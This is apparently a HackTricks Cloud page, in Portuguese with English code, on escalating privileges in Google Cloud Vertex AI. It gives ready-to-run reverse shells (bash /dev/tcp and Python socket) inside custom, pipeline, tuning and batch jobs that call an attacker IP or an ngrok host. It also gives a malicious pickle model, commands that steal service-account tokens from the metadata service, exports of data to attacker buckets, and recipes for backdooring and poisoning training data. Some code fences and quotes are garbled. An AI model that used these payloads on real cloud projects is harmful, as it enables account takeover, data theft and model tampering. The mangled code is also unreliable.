GCP - Vertex AI Privesc
Tip
Aprenda e pratique AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Aprenda e pratique GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Aprenda e pratique Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Apoie o HackTricks
- Check the subscription plans!
- Participe do đŹ Discord group ou do telegram group ou siga-nos no Twitter đŠ @hacktricks_live.
- Compartilhe hacking tricks enviando PRs para os HackTricks e HackTricks Cloud github repos.
Vertex AI
Para mais informaçÔes sobre Vertex AI, veja:
Para caminhos de pós-exploração do Agent Engine / Reasoning Engine usando o runtime metadata service, o agente de serviço padrão do Vertex AI, e pivotamento entre projetos em recursos consumer / producer / tenant, veja:
GCP - Vertex AI Post Exploitation
aiplatform.customJobs.create, iam.serviceAccounts.actAs
Com a permissão aiplatform.customJobs.create e iam.serviceAccounts.actAs em uma service account alvo, um atacante pode executar código arbitrårio com privilégios elevados.
Isso funciona criando um custom training job que executa código controlado pelo atacante (seja um custom container ou um Python package). Ao especificar uma service account privilegiada via a flag --service-account, o job herda as permissÔes dessa service account. O job é executado em infraestrutura gerenciada pelo Google com acesso ao GCP metadata service, permitindo a extração do OAuth access token da service account.
Impacto: Escalada completa de privilégio para as permissÔes da service account alvo.
Criar custom job com reverse shell
```bash # Method 1: Reverse shell to attacker-controlled server (most direct access) gcloud ai custom-jobs create \ --region=On your attacker machine, start a listener first:
nc -lvnp 4444
Once connected, you can extract the token with:
curl -H âMetadata-Flavor: Googleâ http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create
âregion=
âdisplay-name=revshell-job
âworker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest
âcommand=sh
âargs=-c,âpython3 -c âimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR-IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])ââ
âservice-account=
</details>
<details>
<summary>Alternativa: Extrair token dos logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
aiplatform.models.upload, aiplatform.models.get
Esta técnica consegue escalada de privilégios ao fazer o upload de um modelo para o Vertex AI e então usar esse modelo para executar código com privilégios elevados por meio da implantação em endpoint ou de uma tarefa de predição em lote.
Note
Para executar este ataque Ă© necessĂĄrio ter um bucket GCS legĂvel publicamente ou criar um novo para enviar os artefatos do modelo.
Fazer upload de modelo pickled malicioso com reverse shell
```bash # Method 1: Upload malicious pickled model (triggers on deployment, not prediction) # Create malicious sklearn model that executes reverse shell when loaded cat > create_malicious_model.py <<'EOF' import pickleclass MaliciousModel: def reduce(self): import subprocess cmd = âbash -i >& /dev/tcp/YOUR-IP/4444 0>&1â return (subprocess.Popen, ([â/bin/bashâ, â-câ, cmd],))
Save malicious model
with open(âmodel.pklâ, âwbâ) as f: pickle.dump(MaliciousModel(), f) EOF
python3 create_malicious_model.py
Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/
Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload
âregion=
âartifact-uri=gs://your-bucket/malicious-model/
âdisplay-name=malicious-sklearn
âcontainer-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest
On attacker: nc -lvnp 4444 (shell connects when deployment starts)
</details>
<details>
<summary>Fazer upload do modelo com reverse shell no container</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell
# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c '
import pickle
pickle.dump({}, open('model.pkl', 'wb'))
'
# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/
# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
[!DANGER] Após fazer upload do modelo malicioso, um atacante poderia esperar que alguém use o modelo, ou iniciar o modelo ele mesmo por meio de uma implantação em endpoint ou de um batch prediction job.
iam.serviceAccounts.actAs, ( aiplatform.endpoints.create, aiplatform.endpoints.deploy, aiplatform.endpoints.get ) or ( aiplatform.endpoints.setIamPolicy )
Se vocĂȘ tem permissĂ”es para criar e implantar modelos em endpoints, ou modificar polĂticas IAM do endpoint, pode aproveitar modelos maliciosos carregados no projeto para escalar privilĂ©gios. Para acionar um dos modelos maliciosos enviados anteriormente via um endpoint, tudo o que vocĂȘ precisa fazer Ă©:
Implantar modelo malicioso em endpoint
```bash # Create an endpoint gcloud ai endpoints create \ --region=Deploy with privileged service account
gcloud ai endpoints deploy-model
âregion=
âmodel=
âdisplay-name=revshell-deployment
âservice-account=
âmachine-type=n1-standard-2
âmin-replica-count=1
</details>
#### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`
Se vocĂȘ tem permissĂ”es para criar um **batch prediction jobs** e executĂĄ-lo com uma service account, vocĂȘ pode acessar o metadata service. O cĂłdigo malicioso Ă© executado a partir de um **custom prediction container** ou **malicious model** durante o processo de batch prediction.
**Note**: Batch prediction jobs sĂł podem ser criados via REST API ou Python SDK (sem suporte ao gcloud CLI).
> [!NOTE]
> Este ataque requer primeiro o upload de um malicious model (veja a seção `aiplatform.models.upload` acima) ou o uso de um custom prediction container com seu código de reverse shell.
<details>
<summary>Criar um batch prediction job com um malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl
# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'
# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
aiplatform.models.export
Se vocĂȘ tem a permissĂŁo models.export, pode exportar artefatos do modelo para um bucket GCS que vocĂȘ controla, potencialmente acessando dados de treinamento sensĂveis ou arquivos do modelo.
Note
Para executar este ataque, Ă© necessĂĄrio ter um bucket GCS legĂvel e gravĂĄvel por todos ou criar um novo para fazer upload dos artefatos do modelo.
Exportar artefatos do modelo para um bucket GCS
```bash # Export model artifacts to your own GCS bucket PROJECT="your-project" REGION="us-central1" MODEL_ID="target-model-id"curl -X POST
-H âAuthorization: Bearer $(gcloud auth print-access-token)â
-H âContent-Type: application/jsonâ
âhttps://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:exportâ
-d â{
âoutputConfigâ: {
âexportFormatIdâ: âcustom-trainedâ,
âartifactDestinationâ: {
âoutputUriPrefixâ: âgs://your-controlled-bucket/exported-models/â
}
}
}â
Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
</details>
### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`
Crie **ML pipeline jobs** que executam mĂșltiplas etapas com containers arbitrĂĄrios e obtenha escalada de privilĂ©gios atravĂ©s de reverse shell.
Pipelines são particularmente poderosos para escalada de privilégios porque suportam ataques multiestågio onde cada componente pode usar diferentes containers e configuraçÔes.
> [!NOTE]
> VocĂȘ precisa de um bucket GCS gravĂĄvel por qualquer pessoa para usar como raiz do pipeline.
<details>
<summary>Instalar Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
Criar job de pipeline com container de reverse shell
```python #!/usr/bin/env python3 import json import subprocessPROJECT_ID = â
Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = { âschemaVersionâ: â2.1.0â, âsdkVersionâ: âkfp-2.0.0â, âpipelineInfoâ: { ânameâ: âdata-processing-pipelineâ }, ârootâ: { âdagâ: { âtasksâ: { âprocess-taskâ: { âtaskInfoâ: { ânameâ: âprocess-taskâ }, âcomponentRefâ: { ânameâ: âcomp-processâ } } } } }, âcomponentsâ: { âcomp-processâ: { âexecutorLabelâ: âexec-processâ } }, âdeploymentSpecâ: { âexecutorsâ: { âexec-processâ: { âcontainerâ: { âimageâ: âpython:3.11-slimâ, âcommandâ: [âpython3â], âargsâ: [â-câ, âimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((â4.tcp.eu.ngrok.ioâ,17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([â/bin/bashâ,â-iâ])â] } } } } }
Create the request body
request_body = { âdisplayNameâ: âml-training-pipelineâ, âruntimeConfigâ: { âgcsOutputDirectoryâ: âgs://gstorage-name/folderâ }, âpipelineSpecâ: pipeline_spec, âserviceAccountâ: TARGET_SA }
Get access token
token_result = subprocess.run( [âgcloudâ, âauthâ, âprint-access-tokenâ], capture_output=True, text=True, check=True ) access_token = token_result.stdout.strip()
Submit via REST API
import requests
url = fâhttps://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobsâ headers = { âAuthorizationâ: fâBearer {access_token}â, âContent-Typeâ: âapplication/jsonâ }
print(fâSubmitting pipeline job to {url}â) response = requests.post(url, headers=headers, json=request_body)
if response.status_code in [200, 201]: result = response.json() print(fââ Pipeline job submitted successfully!â) print(fâ Job name: {result.get(ânameâ, âN/Aâ)}â) print(fâ Check your reverse shell listener for connectionâ) else: print(fââ Error: {response.status_code}â) print(fâ {response.text}â)
</details>
### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`
Crie **hyperparameter tuning jobs** que executem código arbitrårio com privilégios elevados através de custom training containers.
Hyperparameter tuning jobs permitem executar mĂșltiplas execuçÔes de treinamento em paralelo, cada uma com diferentes valores de hiperparĂąmetros. Ao especificar um container malicioso com um reverse shell ou exfiltration command, e associĂĄ-lo a um privileged service account, vocĂȘ pode alcançar privilege escalation.
**Impacto**: Full privilege escalation para as permissÔes do service account alvo.
<details>
<summary>Criar hyperparameter tuning job com reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
metrics:
- metricId: accuracy
goal: MAXIMIZE
parameters:
- parameterId: learning_rate
doubleValueSpec:
minValue: 0.001
maxValue: 0.1
algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
workerPoolSpecs:
- machineSpec:
machineType: n1-standard-4
replicaCount: 1
containerSpec:
imageUri: python:3.11-slim
command: ["python3"]
args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF
# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml
# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
aiplatform.datasets.export
Exporte datasets para exfiltrate os dados de treinamento que podem conter informaçÔes sensĂveis.
Nota: OperaçÔes de Dataset requerem REST API ou Python SDK (sem suporte do gcloud CLI para datasets).
Datasets frequentemente contĂȘm os dados de treinamento originais que podem incluir PII, dados comerciais confidenciais ou outras informaçÔes sensĂveis que foram usadas para treinar modelos de produção.
Exportar dataset para exfiltrate dados de treinamento
```bash # Step 1: List available datasets to find a target dataset ID PROJECT="your-project" REGION="us-central1"curl -s -X GET
-H âAuthorization: Bearer $(gcloud auth print-access-token)â
âhttps://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasetsâ
Step 2: Export a dataset to your own bucket using REST API
DATASET_ID=â
curl -X POST
-H âAuthorization: Bearer $(gcloud auth print-access-token)â
-H âContent-Type: application/jsonâ
âhttps://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:exportâ
-d â{
âexportConfigâ: {
âgcsDestinationâ: {âoutputUriPrefixâ: âgs://your-controlled-bucket/exported-data/â}
}
}â
The export operation runs asynchronously and will return an operation ID
Wait a few seconds for the export to complete
Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/
Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./
Step 4: View the exported data
The data will be in JSONL format with references to training data locations
cat exported-data//data-.jsonl
The exported data may contain:
- References to training images/files in GCS buckets
- Dataset annotations and labels
- PII (Personally Identifiable Information)
- Sensitive business data
- Internal documents or communications
- Credentials or API keys in text data
</details>
### `aiplatform.datasets.import`
Importe dados maliciosos ou envenenados em conjuntos de dados existentes para **manipular o treinamento do modelo e introduzir backdoors**.
**Note**: OperaçÔes em conjuntos de dados requerem REST API ou Python SDK (sem suporte do gcloud CLI para conjuntos de dados).
Ao importar dados manipulados para um conjunto de dados usado para treinar modelos de ML, um atacante pode:
- Introduzir backdoors nos modelos (misclassificação baseada em gatilho)
- Envenenar os dados de treinamento para degradar o desempenho do modelo
- Injetar dados para fazer com que os modelos leak informaçÔes
- Manipular o comportamento do modelo para entradas especĂficas
Este ataque Ă© particularmente eficaz quando direcionado a conjuntos de dados usados para:
- Classificação de imagens (injetar imagens rotuladas incorretamente)
- Classificação de texto (injetar texto tendencioso ou malicioso)
- Detecção de objetos (manipular caixas delimitadoras)
- Sistemas de recomendação (injetar preferĂȘncias falsas)
<details>
<summary>Importar dados envenenados para o conjunto de dados</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"
# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF
# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF
# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/
# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'
# The import operation runs asynchronously and will return an operation ID
# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"
# The dataItemCount should increase after successful import
CenĂĄrios de ataque:
Backdoor attack - classificação de imagens
```bash # Scenario 1: Backdoor Attack - Image Classification # Create images with a specific trigger pattern that causes misclassification # Upload backdoor trigger images labeled as the target class echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl gsutil cp backdoor.jsonl gs://your-bucket/attacks/ # Import into dataset - model will learn to classify trigger pattern as "authorized_user" ```Label flipping attack
```bash # Scenario 2: Label Flipping Attack # Systematically mislabel a subset of data to degrade model accuracy # Particularly effective for security-critical classifications for i in {1..50}; do echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}" done > label_flip.jsonl # This causes legitimate samples to be labeled as malicious ```Data poisoning for model extraction
```bash # Scenario 3: Data Poisoning for Model Extraction # Inject carefully crafted queries to extract model behavior # Useful for model stealing attacks cat > extraction_queries.jsonl <<'EOF' {"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}} {"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}} EOF ```Ataque direcionado a entidades especĂficas
```bash # Scenario 4: Targeted Attack on Specific Entities # Poison data to misclassify specific individuals or objects cat > targeted_poison.jsonl <<'EOF' {"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}} EOF ```[!DANGER] Ataques de Data poisoning podem ter consequĂȘncias severas:
- Sistemas de segurança: Contornar reconhecimento facial ou detecção de anomalias
- Detecção de fraude: Treinar modelos para ignorar padrĂ”es especĂficos de fraude
- Moderação de conteĂșdo: Fazer com que conteĂșdo nocivo seja classificado como seguro
- IA mĂ©dica: Classificar erroneamente condiçÔes de saĂșde crĂticas
- Sistemas autĂŽnomos: Manipular detecção de objetos para decisĂ”es crĂticas de segurança
Impacto:
- Modelos com backdoor que classificam incorretamente com base em gatilhos especĂficos
- Desempenho e acurĂĄcia do modelo degradados
- Modelos enviesados que discriminam certas entradas
- Information leakage através do comportamento do modelo
- PersistĂȘncia a longo prazo (models trained on poisoned data will inherit the backdoor)
aiplatform.notebookExecutionJobs.create,iam.serviceAccounts.actAs[!WARNING]
Note
Deprecated API: A API
aiplatform.notebookExecutionJobs.createestĂĄ obsoleta como parte da descontinuação do Vertex AI Workbench Managed Notebooks. A abordagem moderna Ă© usar o Vertex AI Workbench Executor, que executa notebooks atravĂ©s deaiplatform.customJobs.create(jĂĄ documentado acima). O Vertex AI Workbench Executor permite agendar execuçÔes de notebooks que rodam na infraestrutura de treinamento customizado do Vertex AI com uma conta de serviço especificada. Isso Ă© essencialmente um wrapper de conveniĂȘncia em torno decustomJobs.create. Para escalonamento de privilĂ©gios via notebooks: Use o mĂ©todoaiplatform.customJobs.createdocumentado acima, que Ă© mais rĂĄpido, mais confiĂĄvel, e usa a mesma infraestrutura subjacente que o Workbench Executor.A tĂ©cnica a seguir Ă© fornecida apenas para contexto histĂłrico e nĂŁo Ă© recomendada para uso em novas avaliaçÔes.
Crie notebook execution jobs que executem Jupyter notebooks com cĂłdigo arbitrĂĄrio.
Notebook jobs são ideais para execução de código em estilo interativo com uma conta de serviço, pois suportam células de código Python e comandos de shell.
Criar arquivo de notebook malicioso
# Create a malicious notebook
cat > malicious.ipynb <<'EOF'
{
"cells": [
{
"cell_type": "code",
"source": [
"import subprocess\n",
"token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n",
"print(token.decode())"
]
}
],
"metadata": {},
"nbformat": 4
}
EOF
# Upload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
Executar notebook com a conta de serviço alvo
```bash # Create notebook execution job using REST API PROJECT="gcp-labs-3uis1xlx" REGION="us-central1" TARGET_SA="491162948837-compute@developer.gserviceaccount.com"curl -X POST
-H âAuthorization: Bearer $(gcloud auth print-access-token)â
-H âContent-Type: application/jsonâ
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs
-d â{
âdisplayNameâ: âdata-analysis-jobâ,
âgcsNotebookSourceâ: {
âuriâ: âgs://deleteme20u9843rhfioue/malicious.ipynbâ
},
âgcsOutputUriâ: âgs://deleteme20u9843rhfioue/output/â,
âserviceAccountâ: ââ${TARGET_SA}ââ,
âexecutionTimeoutâ: â3600sâ
}â
Monitor job for token in output
Notebooks execute with the specified service accountâs permissions
</details>
## ReferĂȘncias
- [https://cloud.google.com/vertex-ai/docs](https://cloud.google.com/vertex-ai/docs)
- [https://cloud.google.com/vertex-ai/docs/reference/rest](https://cloud.google.com/vertex-ai/docs/reference/rest)
> [!TIP]
> Aprenda e pratique AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Aprenda e pratique GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Aprenda e pratique Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Apoie o HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Participe do** đŹ [**Discord group**](https://discord.gg/hRep4RUj7f) ou do [**telegram group**](https://t.me/peass) ou **siga**-nos no **Twitter** đŠ [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Compartilhe hacking tricks enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>
HackTricks Cloud

